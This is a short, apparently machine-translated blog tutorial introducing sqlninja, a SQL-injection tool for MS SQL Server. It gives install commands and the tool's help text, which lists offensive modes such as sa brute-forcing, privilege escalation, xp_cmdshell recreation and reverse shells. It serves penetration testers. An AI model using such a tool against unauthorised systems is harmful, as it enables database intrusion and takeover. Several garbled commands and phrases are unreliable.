Surely most of you know sqlmap as the most common sql injection vulnerability tool in web applications. In addition to sqlmap, in this article we will come across another, sqlninja, an open source tool written in Perl that specializes in finding sql injection vulnerabilities in web applications that use Microsoft SQL Server as a backend.
Its main purpose is to provide the attacker with remote access to the vulnerable base even when the general environment in which the base is located is hostile. It can be used by penetration testers and security analysts who want to check for sql injection vulnerabilities.
What is SQL injection?
SQL injection is a hacking technique where the attacker, by modifying the URL or some other character input field of the web application, can insert SQL commands directly into the database. This results in overriding application security techniques and as a result the attacker can extract data from the entire database, modify it and even delete it.
It is one of the oldest and most dangerous attacks on web applications. The organization OWASP (Open Web Application Security Project) classifies injection threats to number one of the list of Top 10 web application security threats (OWASP Top 10).
How to use it
Sqlninja is available for Unix operating systems that have a Perl interpreter. This means that the platforms that can support it are the following:
- Mac OS X
Sqlninja is not currently supported by Windows operating systems . It will
find a pre-installed Linux distro for penetration testing, Kali Linux .
Linux Ubuntu & Debian
Install Perm modules
To install Perm modules open a terminal and run the following:
perl - MCPAN - e "install Net :: RawIP" perl - MCPAN - e "install Net :: Pcap" perl - MCPAN - e "install Net :: PcapUtils" perl - MCPAN - e "install Net :: Packet" perl - MCPAN - e "install Net :: DNS" perl - MCPAN - e "install IO :: Socket :: SSL"
To download and unzip the sqlninja folder, open a terminal and run the following:
wget https : //sourceforge.net/projects/sqlninja/files/sqlninja/sqlninja-0.2.999-alpha1.tgz tar zxvf sqlninja - 0 . 2 . 999 - alpha1 . tgz cd sqlninja - 0 . 2 . 999 - alpha1 . tgz
How to use it
Now let’s look at some of the options we have using sqlninja.
Initially we can see all the possible options we have running sqlninja in a terminal:
root @ horse : ~ # sqlninja Sqlninja rel . 0 . 2 . 6 - r1 Copyright ( C ) 2006 - 2011 icesurfer < r00t @ northernfortress . net > Usage : / usr / bin / sqlninja - m < mode > : Required . Available modes are : t / test - test whether the injection is working f / fingerprint - fingerprint user , xp_cmdshell and more b / bruteforce - bruteforce sa account e / escalation - add user to sysadmin server role x / resurrectxp - try to recreate xp_cmdshell u / upload - upload a . scr file s / dirshell - start a direct shell k / backscan - look for an open outbound port r / revshell - start a reverse shell d / dnstunnel - attempt a dns tunneled shell i / icmpshell - start a reverse ICMP shell c / sqlcmd - issue a 'blind' OS command m / metasploit - wrapper to Metasploit stagers - f < file > : configuration file ( default : sqlninja . conf ) - p < password > : how much password - w < wordlist > : wordlist to use in bruteforce mode ( dictionary method only toggle ) - g : Generate debug script and EXIT ( only toggle Valid-In upload mode ) - v : --verbose output - d < mode > : activate debug 1 - print Each Supplier injected command 2 - print Each Supplier RAW HTTP request 3 - print Each Supplier RAW HTTP Response all - all of the above ... see sqlninja - howto . html for details
The behavior of sqlninja is controlled through the sqlninja.conf configuration file, with which we can direct the tool to the target, how it is attacked, and how to use other management parameters. These may be the following:
- -m <attackmode>: controls the attack mode by telling sqlninja what to do. Possible parameter values can be:
- -v: verbose output
- -f <configuration file>: specifies the configuration file to use.
- -p <‘sa’ password>: used in escalation mode to add the existing database user to the sysadmin group. In other modes it is used to enable the user to run queries as an administrator.
- -w <wordlist>: list of possible passwords for bruteforce mode
- -d <debug mode>: activates debug mode in case of troubleshooting. Possible values are:
- 1: print every command that gets inject
- 2: print each HTTP request to the target
- 3: print out each HTTP response from the target
- All: all of the above
A config file may look like this:
For even more detail about the tool sqlninja recommend to visit the page with the official documentation and to see a live application of the techniques of the related video .
How did you like it; We are waiting for impressions.